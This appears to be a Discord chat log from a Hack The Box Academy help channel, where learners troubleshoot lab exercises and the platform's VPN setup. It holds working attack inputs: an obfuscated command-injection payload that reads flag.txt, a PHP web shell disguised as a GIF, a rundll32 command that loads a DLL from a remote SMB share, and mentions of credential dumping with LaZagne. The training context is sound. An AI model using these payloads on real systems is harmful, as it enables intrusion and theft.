<@&861185840277487616> insulting me and i felt very harassed

👀

💀

Looks like they showed themselves out.

Mobile still shows them in the server but I trust

thanx, found it (made it harder then it realy is😅 )

can anyone help with the skills assessment for command injection?

Someone probably can help

But you'd have to ask your question and provide context of what you've already tried

Hello everyone! Got a questions about lazagne.exe v2.4.5. When i run it:start LaZagne.exe all it suddenly crashes! Whats wrong with it

Thats pretty vague, are you providing any arguments to it?

yes: start LaZagne.exe all

Hears some specific documentation on it https://github.com/AlessandroZ/LaZagne

my payload right now is /index.php?to=tmp&from=877915113.txt${IFS}${LS_COLORS:10:1}$(rev<<<'tac')${IFS}..${PATH:0:1}..${PATH:0:1}..${PATH:0:1}flag.txt&finish=1&move=1

and the error I am receiving is Error while moving: mv: cannot stat '/var/www/html/files/877915113.txt': No such file or directory<br>mv: cannot stat 'cat': No such file or directory<br>mv: cannot move '../../../flag.txt' to '/var/www/html/files/tmp/flag.txt': P

@fathom pendant thx! Reading docu is helpful 🙂

Hello, does someone know why this isnt working?

the cookie is working

Finally finished Whitebox Prototype Pollution RCE, this took me sooo long but now I´m proud 😄

module section?

hi I am confused as to how to use nessus in the academy

they have provided me with the server and the creds but nessus needs gui

should I do ssh?

its https server is exposed

as pointed out in the text

you connect the vpn and it takes a little to set it up

I am using pwnbox so do I use the browser within pwnbox and then try to access the server from http://10.129.x.x

if so I am getting a unable to connect error

should I add it to hosts?

FILE INCLUSION
LFI and File Uploads
Having some problems with this lab. Im using this command:
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
But when trying to upload the gif to te upload button it doesn't work.
Get no output(no outputs nothing)

I can connect to it via ssh but I do not think I can access nessus through it

any idea what am I doing wrong?

I am trying to connect to server using both WebDAV ports but I am getting connection refused

it is https

tried both from the browser and connect to server option in the file manager

what?

https://10.129.x.x

it works on my machine

regenerate the target idk

ok

Unable to connect

An error occurred during a connection to 10.129.202.116.

    The site could be temporarily unavailable or too busy. Try again in a few moments.
    If you are unable to load any pages, check your computer’s network connection.
    If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web.

it takes time

let it deploy the environment xd

just to confirm I have to use firefox in the pwnbox right?

pwmbox or your own vm

if pwnbox DONT connect openvpn

and then use the url https://10.129.x.x

yes

ok

its not working

got it

I have to login through 8834 port

Ye

maybe read

sorry for not telling but i didnt remember the port 🤣

although i did it yesterday

can anyone give me a hand on Attacking Common Applications: Thick Client:

The exe doesnt' spawn cause powershell seems to be mucked up on the vm, so I configure the exe on my kali machine with the base64 and then i cant find the right bit in memory with the magic bytes

Hello, I'm currently working on the Windows Priv Esc module, on the Dns Admins page. I've followed all of the steps of uploading the Dll file, using the dnscmd.exe successfully, restarting the DNS server. when i run the "net group "Domain Admins" /dom" command it shows my user as the Administrator of the group. When I then go to access the C:\Users\Administrators folder is tells me access is denied. There are no further instructions on the module. Am I missing a step that is undisclosed?

Log out and log back in

Would anyone be willing to have a chat through DMs? I've posted for assistance here a few times already. A mentor would be cool, but not necessary.

Do you have it by now?

not yet. what am i doing wrong?

Trust me, asking questions isn't a bad thing

If you dont get an output first check if your proxy intercepted the request, if this is not the issue, turn the proxy ON and - right click -> intercept response to this request

@glossy wedge

alr ill try that thanks

I'm not sure that one is in rockyou give me a sec to verify

Like I said seeing if that password is in rockyou

It's in it

I just checked

And you used the same hashcat mode yeah?

Ty, this worked. Is this because Access Tokens are only created during a new session?

Yeah I grepped the password in rockyou and it's there

Also you don't need to specify format with john

Maybe your rockyou is slightly different

The one I have is ~14m passwords

If you do wc -l what size is yours, out of curiosity

Huh same size

Try grepping the pw you found in your vm

do the password have some special character?

ive had problems with original rockyou encoding

which iirc is ASCII

but after transforming it into unicode all worked like a charm

It does not

It's alphanum

then its not it

hihi

actually weird

lol

I literally just fact checked the question lol and it exists in the thing, and it worked in pwnbox, which is weirder

does it work for you in local hashcat?

i mean it has to work

lol

It worked for me when I first did it lol

And with john

yea

Can anyone DM me for help with this one?

I've managed to locate the flag, well, all 100+ of them, but really need some help refining my results and haven't had luck in the last few days. Hitting my end

files size

empty = 0 bytes

something inside like a flag > 0 bytes

Oh my fucking god, how shit is the VPN

Care to elaborate on your expletives?

Referencing OOB XXE And VPN drops zzz

Just here to complain

Git rekt

And it's more than likely your connection rather than the vpn, but sometimes vpn regions do shit the bed

Even pwnbox is sleeping

Well if you're connecting to the vpn AND pwnbox: you're gonna have a bad time

My fucking god

That was the problem

Thanks @fathom pendant

The technical reason is both the pwnbox and the vpn are assigned the same network ip, so interacting with targets causes collisions where it doesn't know which way to route traffic due to it having 2 machines with the same ip to call back to

Anybody know why I would be getting a NTLMv2 hash back instead of a meterpreter shell in metasploit? Specifically the Windows Server Windows Priv Esc module. I run the command "rundll32.exe \10.10.14.3\lEUZam\test.dll,0" on the target machine like it says to.

what are you using for the handler

cause if you used impacket smbserver to serve up the dll then yeah it records the ntlmv2 hash alongside serving up the file

but thatd be independent of you actually catching the shell

Im just using metasploit for this section. windows/smb/smb_delivery

oh

for the command: "rundll32.exe \10.10.14.23\uCDFZ\test.dll,0", the uCDFZ part is random everytime you run it, I just copied it straight from the module.

in the module its C:\htb> rundll32.exe \10.10.14.3\lEUZam\test.dll,0

Hey @thorn urchin can u give me any advice regarding my question? Been brute forcing for 30 minutes with the correct command but no luck. Is my system too shit to brute force fast enough?

shouldnt depend much on your system

command may not actually be correct, I find hydra's fail string stuff to be finnicky

guys does anyone has this probleme befor i enabled the Heads Up Display (HUD), and still cannot see theme in my browser

i fixed it

Try this (The request must be in JSON format):

curl -X POST http://<IP_Target>:<Port>/search.php -b "PHPSESSID=<Cookie>" -H "Content-Type: application/json" -d '{"search":"flag"}'

Hi
https://academy.hackthebox.com/module/80/section/848
I am a rookie and have no idea when doing this skill assessment. Can you give me some detailed tips?

Hello all. Can anyone please ping the Windows Privilege Escalation Skills Assessment - Part I ? I am wondering if its me or something else, the whole module has been fine up to this point. I reset it a few times and rebooted my machine. I have gotten no pings at all.

Hello

In Footprinting lab - medium

I'm connected to the MSSQL studio

And i want to find the user "HTB"

And I've been looking around but couldn't find it

Any idea where can i find it?

You have to be a subscribed to do some rooms?

Like the hack the boo

Just in case you are still stuck, search by files with the same content as Zone.Identifier. If the file was only renamed its metadata keeps the same content

still down

Are you sure it responds to pings? Have you attempted an NMAP scan with the -Pn flag?